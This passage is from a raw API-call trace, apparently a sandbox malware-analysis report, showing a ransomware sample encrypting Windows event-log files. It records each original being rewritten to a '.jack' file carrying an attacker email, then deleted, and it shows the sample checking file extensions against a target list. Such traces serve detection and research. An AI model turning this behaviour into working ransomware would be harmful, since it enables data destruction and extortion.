dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x44c [0215.256] GetFileSizeEx (in: hFile=0x44c, lpFileSize=0x355ff14 | out: lpFileSize=0x355ff14*=69632) returned 1 [0215.256] CloseHandle (hObject=0x44c) returned 1 [0215.256] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-volumesnapshot-driver%4operational.evtx")) returned 0x20 [0215.256] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\logs\\microsoft-windows-volumesnapshot-driver%4operational.evtx.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0215.256] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-volumesnapshot-driver%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x44c [0215.257] SetFilePointerEx (in: hFile=0x44c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fec0 | out: lpNewFilePointer=0x0) returned 1 [0215.257] SetFilePointerEx (in: hFile=0x44c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fec0 | out: lpNewFilePointer=0x0) returned 1 [0215.257] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\logs\\microsoft-windows-volumesnapshot-driver%4operational.evtx.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d8 [0215.257] GetLastError () returned 0x0 [0215.257] ReadFile (in: hFile=0x44c, lpBuffer=0x4229020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x355fecc, lpOverlapped=0x0 | out: lpBuffer=0x4229020*, lpNumberOfBytesRead=0x355fecc*=0x11000, lpOverlapped=0x0) returned 1 [0215.260] WriteFile (in: hFile=0x3d8, lpBuffer=0x4229020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x355fc94, lpOverlapped=0x0 | out: lpBuffer=0x4229020*, lpNumberOfBytesWritten=0x355fc94*=0x11010, lpOverlapped=0x0) returned 1 [0215.262] ReadFile (in: hFile=0x44c, lpBuffer=0x4229020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x355fecc, lpOverlapped=0x0 | out: lpBuffer=0x4229020*, lpNumberOfBytesRead=0x355fecc*=0x0, lpOverlapped=0x0) returned 1 [0215.262] WriteFile (in: hFile=0x3d8, lpBuffer=0x4229020*, nNumberOfBytesToWrite=0x146, lpNumberOfBytesWritten=0x355fc94, lpOverlapped=0x0 | out: lpBuffer=0x4229020*, lpNumberOfBytesWritten=0x355fc94*=0x146, lpOverlapped=0x0) returned 1 [0215.263] SetEndOfFile (hFile=0x3d8) returned 1 [0215.263] CloseHandle (hObject=0x3d8) returned 1 [0215.265] SetFilePointerEx (in: hFile=0x44c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fec0 | out: lpNewFilePointer=0x0) returned 1 [0215.265] SetEndOfFile (hFile=0x44c) returned 1 [0215.266] CloseHandle (hObject=0x44c) returned 1 [0215.267] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x20) returned 1 [0215.267] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-volumesnapshot-driver%4operational.evtx")) returned 1 [0215.267] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx") returned 65 [0215.267] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx") returned 65 [0215.267] lstrlenW (lpString=".doc") returned 4 [0215.267] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0215.267] lstrlenW (lpString=".docx") returned 5 [0215.267] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0215.267] lstrlenW (lpString=".pdf") returned 4 [0215.267] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0215.268] lstrlenW (lpString=".xls") returned 4 [0215.268] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0215.268] lstrlenW (lpString=".xlsx") returned 5 [0215.268] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0215.268] lstrlenW (lpString=".ppt") returned 4 [0215.268] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0215.268] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx") returned 65 [0215.268] lstrlenW (lpString=".zip") returned 4 [0215.268] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0215.268] lstrlenW (lpString=".rar") returned 4 [0215.268] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0215.268] lstrlenW (lpString=".bz2") returned 4 [0215.268] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0215.268] lstrlenW (lpString=".7z") returned 3 [0215.268] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0215.268] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx") returned 65 [0215.268] lstrlenW (lpString=".dbf") returned 4 [0215.268] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0215.268] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx") returned 65 [0215.268] lstrlenW (lpString=".1cd") returned 4 [0215.268] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0215.268] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx") returned 65 [0215.268] lstrlenW (lpString=".jpg") returned 4 [0215.268] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0215.268] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx") returned 65 [0215.268] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx") returned 65 [0215.268] lstrlenW (lpString=".doc") returned 4 [0215.269] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0215.269] lstrlenW (lpString=".docx") returned 5 [0215.269] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0215.269] lstrlenW (lpString=".pdf") returned 4 [0215.269] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0215.269] lstrlenW (lpString=".xls") returned 4 [0215.269] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0215.269] lstrlenW (lpString=".xlsx") returned 5 [0215.269] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0215.269] lstrlenW (lpString=".ppt") returned 4 [0215.269] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0215.269] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx") returned 65 [0215.269] lstrlenW (lpString=".zip") returned 4 [0215.269] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0215.269] lstrlenW (lpString=".rar") returned 4 [0215.269] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0215.269] lstrlenW (lpString=".bz2") returned 4 [0215.269] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0215.269] lstrlenW (lpString=".7z") returned 3 [0215.269] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0215.269] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx") returned 65 [0215.269] lstrlenW (lpString=".dbf") returned 4 [0215.269] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0215.269] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx") returned 65 [0215.269] lstrlenW (lpString=".1cd") returned 4 [0215.269] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0215.269] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx") returned 65 [0215.270] lstrlenW (lpString=".jpg") returned 4 [0215.270] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0215.270] lstrcmpiW (lpString1=".evtx", lpString2=".jack") returned -1 [0215.270] lstrlenW (lpString="Microsoft-Windows-Wcmsvc%4Operational.evtx") returned 42 [0215.270] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Wcmsvc%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-wcmsvc%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x44c [0215.270] GetFileSizeEx (in: hFile=0x44c, lpFileSize=0x355ff14 | out: lpFileSize=0x355ff14*=69632) returned 1 [0215.270] CloseHandle (hObject=0x44c) returned 1 [0215.270] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Wcmsvc%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-wcmsvc%4operational.evtx")) returned 0x20 [0215.270] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Wcmsvc%4Operational.evtx.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\logs\\microsoft-windows-wcmsvc%4operational.evtx.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0215.270] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Wcmsvc%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-wcmsvc%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x44c [0215.271] SetFilePointerEx (in: hFile=0x44c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fec0 | out: lpNewFilePointer=0x0) returned 1 [0215.271] SetFilePointerEx (in: hFile=0x44c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fec0 | out: lpNewFilePointer=0x0) returned 1 [0215.271] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Wcmsvc%4Operational.evtx.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\logs\\microsoft-windows-wcmsvc%4operational.evtx.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d8 [0215.271] GetLastError () returned 0x0 [0215.271] ReadFile (in: hFile=0x44c, lpBuffer=0x4229020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x355fecc, lpOverlapped=0x0 | out: lpBuffer=0x4229020*, lpNumberOfBytesRead=0x355fecc*=0x11000, lpOverlapped=0x0) returned 1 [0215.274] WriteFile (in: hFile=0x3d8, lpBuffer=0x4229020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x355fc94, lpOverlapped=0x0 | out: lpBuffer=0x4229020*, lpNumberOfBytesWritten=0x355fc94*=0x11010, lpOverlapped=0x0) returned 1 [0215.276] ReadFile (in: hFile=0x44c, lpBuffer=0x4229020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x355fecc, lpOverlapped=0x0 | out: lpBuffer=0x4229020*, lpNumberOfBytesRead=0x355fecc*=0x0, lpOverlapped=0x0) returned 1 [0215.276] WriteFile (in: hFile=0x3d8, lpBuffer=0x4229020*, nNumberOfBytesToWrite=0x128, lpNumberOfBytesWritten=0x355fc94, lpOverlapped=0x0 | out: lpBuffer=0x4229020*, lpNumberOfBytesWritten=0x355fc94*=0x128, lpOverlapped=0x0) returned 1 [0215.276] SetEndOfFile (hFile=0x3d8) returned 1 [0215.277] CloseHandle (hObject=0x3d8) returned 1 [0215.279] SetFilePointerEx (in: hFile=0x44c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fec0 | out: lpNewFilePointer=0x0) returned 1 [0215.279] SetEndOfFile (hFile=0x44c) returned 1 [0215.280] CloseHandle (hObject=0x44c) returned 1 [0215.280] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Wcmsvc%4Operational.evtx.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x20) returned 1 [0215.281] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Wcmsvc%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-wcmsvc%4operational.evtx")) returned 1 [0215.281] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Wcmsvc%4Operational.evtx") returned 50 [0215.281] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Wcmsvc%4Operational.evtx") returned 50 [0215.281] lstrlenW (lpString=".doc") returned 4 [0215.281] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0215.281] lstrlenW (lpString=".docx") returned 5 [0215.281] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0215.281] lstrlenW (lpString=".pdf") returned 4 [0215.281] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0215.281] lstrlenW (lpString=".xls") returned 4 [0215.281] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0215.281] lstrlenW (lpString=".xlsx") returned 5 [0215.281] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0215.281] lstrlenW (lpString=".ppt") returned 4 [0215.281] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0215.281] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Wcmsvc%4Operational.evtx") returned 50 [0215.282] lstrlenW (lpString=".zip") returned 4 [0215.282] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0215.282] lstrlenW (lpString=".rar") returned 4 [0215.282] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0215.282] lstrlenW (lpString=".bz2") returned 4 [0215.282] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0215.282] lstrlenW (lpString=".7z") returned 3 [0215.282] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0215.282] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Wcmsvc%4Operational.evtx") returned 50 [0215.282] lstrlenW (lpString=".dbf") returned 4 [0215.282] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0215.282] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Wcmsvc%4Operational.evtx") returned 50 [0215.282] lstrlenW (lpString=".1cd") returned 4 [0215.282] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0215.282] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Wcmsvc%4Operational.evtx") returned 50 [0215.282] lstrlenW (lpString=".jpg") returned 4 [0215.282] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0215.282] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Wcmsvc%4Operational.evtx") returned 50 [0215.282] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Wcmsvc%4Operational.evtx") returned 50 [0215.282] lstrlenW (lpString=".doc") returned 4 [0215.282] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0215.282] lstrlenW (lpString=".docx") returned 5 [0215.282] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0215.282] lstrlenW (lpString=".pdf") returned 4 [0215.282] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0215.283] lstrlenW (lpString=".xls") returned 4 [0215.283] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0215.283] lstrlenW (lpString=".xlsx") returned 5 [0215.283] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0215.283] lstrlenW (lpString=".ppt") returned 4 [0215.283] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0215.283] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Wcmsvc%4Operational.evtx") returned 50 [0215.283] lstrlenW (lpString=".zip") returned 4 [0215.283] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0215.283] lstrlenW (lpString=".rar") returned 4 [0215.283] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0215.283] lstrlenW (lpString=".bz2") returned 4 [0215.283] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0215.283] lstrlenW (lpString=".7z") returned 3 [0215.283] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0215.283] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Wcmsvc%4Operational.evtx") returned 50 [0215.283] lstrlenW (lpString=".dbf") returned 4 [0215.283] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0215.283] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Wcmsvc%4Operational.evtx") returned 50 [0215.283] lstrlenW (lpString=".1cd") returned 4 [0215.283] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0215.283] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Wcmsvc%4Operational.evtx") returned 50 [0215.283] lstrlenW (lpString=".jpg") returned 4 [0215.283] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0215.284] lstrcmpiW (lpString1=".evtx", lpString2=".jack") returned -1 [0215.284] lstrlenW (lpString="Microsoft-Windows-Windows Defender%4Operational.evtx") returned 52 [0215.284] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Windows Defender%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-windows defender%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x44c [0215.284] GetFileSizeEx (in: hFile=0x44c, lpFileSize=0x355ff14 | out: lpFileSize=0x355ff14*=69632) returned 1 [0215.284] CloseHandle (hObject=0x44c) returned 1 [0215.284] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Windows Defender%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-windows defender%4operational.evtx")) returned 0x20 [0215.284] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Windows Defender%4Operational.evtx.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\logs\\microsoft-windows-windows defender%4operational.evtx.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0215.284] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Windows Defender%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-windows defender%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x44c [0215.284] SetFilePointerEx (in: hFile=0x44c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fec0 | out: lpNewFilePointer=0x0) returned 1 [0215.285] SetFilePointerEx (in: hFile=0x44c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fec0 | out: lpNewFilePointer=0x0) returned 1 [0215.285] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Windows Defender%4Operational.evtx.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\logs\\microsoft-windows-windows defender%4operational.evtx.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x450 [0215.324] GetLastError () returned 0x0 [0215.324] ReadFile (in: hFile=0x44c, lpBuffer=0x4229020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x355fecc, lpOverlapped=0x0 | out: lpBuffer=0x4229020*, lpNumberOfBytesRead=0x355fecc*=0x11000, lpOverlapped=0x0) returned 1 [0218.012] WriteFile (in: hFile=0x450, lpBuffer=0x4229020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x355fc94, lpOverlapped=0x0 | out: lpBuffer=0x4229020*, lpNumberOfBytesWritten=0x355fc94*=0x11010, lpOverlapped=0x0) returned 1 [0219.811] ReadFile (in: hFile=0x44c, lpBuffer=0x4229020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x355fecc, lpOverlapped=0x0 | out: lpBuffer=0x4229020*, lpNumberOfBytesRead=0x355fecc*=0x0, lpOverlapped=0x0) returned 1 [0219.811] WriteFile (in: hFile=0x450, lpBuffer=0x4229020*, nNumberOfBytesToWrite=0x13c, lpNumberOfBytesWritten=0x355fc94, lpOverlapped=0x0 | out: lpBuffer=0x4229020*, lpNumberOfBytesWritten=0x355fc94*=0x13c, lpOverlapped=0x0) returned 1 [0219.811] SetEndOfFile (hFile=0x450) returned 1 [0219.811] CloseHandle (hObject=0x450) returned 1 [0219.813] SetFilePointerEx (in: hFile=0x44c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fec0 | out: lpNewFilePointer=0x0) returned 1 [0219.813] SetEndOfFile (hFile=0x44c) returned 1 [0219.814] CloseHandle (hObject=0x44c) returned 1 [0219.814] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Windows Defender%4Operational.evtx.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x20) returned 1 [0219.814] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Windows Defender%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-windows defender%4operational.evtx")) returned 1 [0219.815] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Windows Defender%4Operational.evtx") returned 60 [0219.815] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Windows Defender%4Operational.evtx") returned 60 [0219.815] lstrlenW (lpString=".doc") returned 4 [0219.815] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0219.815] lstrlenW (lpString=".docx") returned 5 [0219.815] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0219.815] lstrlenW (lpString=".pdf") returned 4 [0219.815] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0219.815] lstrlenW (lpString=".xls") returned 4 [0219.815] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0219.815] lstrlenW (lpString=".xlsx") returned 5 [0219.815] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0219.815] lstrlenW (lpString=".ppt") returned 4 [0219.815] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0219.815] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Windows Defender%4Operational.evtx") returned 60 [0219.815] lstrlenW (lpString=".zip") returned 4 [0219.815] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0219.815] lstrlenW (lpString=".rar") returned 4 [0219.815] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0219.815] lstrlenW (lpString=".bz2") returned 4 [0219.815] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0219.815] lstrlenW (lpString=".7z") returned 3 [0219.815] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0219.815] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Windows Defender%4Operational.evtx") returned 60 [0219.815] lstrlenW (lpString=".dbf") returned 4 [0219.815] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0219.815] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Windows Defender%4Operational.evtx") returned 60 [0219.815] lstrlenW (lpString=".1cd") returned 4 [0219.815] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0219.815] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Windows Defender%4Operational.evtx") returned 60 [0219.816] lstrlenW (lpString=".jpg") returned 4 [0219.816] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0219.816] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Windows Defender%4Operational.evtx") returned 60 [0219.816] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Windows Defender%4Operational.evtx") returned 60 [0219.816] lstrlenW (lpString=".doc") returned 4 [0219.816] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0219.816] lstrlenW (lpString=".docx") returned 5 [0219.816] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0219.816] lstrlenW (lpString=".pdf") returned 4 [0219.816] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0219.816] lstrlenW (lpString=".xls") returned 4 [0219.816] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0219.816] lstrlenW (lpString=".xlsx") returned 5 [0219.816] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0219.816] lstrlenW (lpString=".ppt") returned 4 [0219.816] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0219.816] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Windows Defender%4Operational.evtx") returned 60 [0219.816] lstrlenW (lpString=".zip") returned 4 [0219.816] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0219.816] lstrlenW (lpString=".rar") returned 4 [0219.816] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0219.816] lstrlenW (lpString=".bz2") returned 4 [0219.816] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0219.816] lstrlenW (lpString=".7z") returned 3 [0219.816] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0219.816] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Windows Defender%4Operational.evtx") returned 60 [0219.816] lstrlenW (lpString=".dbf") returned 4 [0219.816] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0219.816] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Windows Defender%4Operational.evtx") returned 60 [0219.816] lstrlenW (lpString=".1cd") returned 4 [0219.816] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0219.816] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Windows Defender%4Operational.evtx") returned 60 [0219.816] lstrlenW (lpString=".jpg") returned 4 [0219.816] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0219.817] lstrcmpiW (lpString1=".evtx", lpString2=".jack") returned -1 [0219.817] lstrlenW (lpString="Microsoft-Windows-WMI-Activity%4Operational.evtx") returned 48 [0219.817] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-WMI-Activity%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-wmi-activity%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x44c [0219.817] GetFileSizeEx (in: hFile=0x44c, lpFileSize=0x355ff14 | out: lpFileSize=0x355ff14*=1052672) returned 1 [0219.817] CloseHandle (hObject=0x44c) returned 1 [0219.817] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-WMI-Activity%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-wmi-activity%4operational.evtx")) returned 0x20 [0219.817] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-WMI-Activity%4Operational.evtx.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\logs\\microsoft-windows-wmi-activity%4operational.evtx.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0219.817] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-WMI-Activity%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-wmi-activity%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x44c [0219.817] SetFilePointerEx (in: hFile=0x44c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fec0 | out: lpNewFilePointer=0x0) returned 1 [0219.817] SetFilePointerEx (in: hFile=0x44c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fec0 | out: lpNewFilePointer=0x0) returned 1 [0219.817] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-WMI-Activity%4Operational.evtx.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\logs\\microsoft-windows-wmi-activity%4operational.evtx.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, 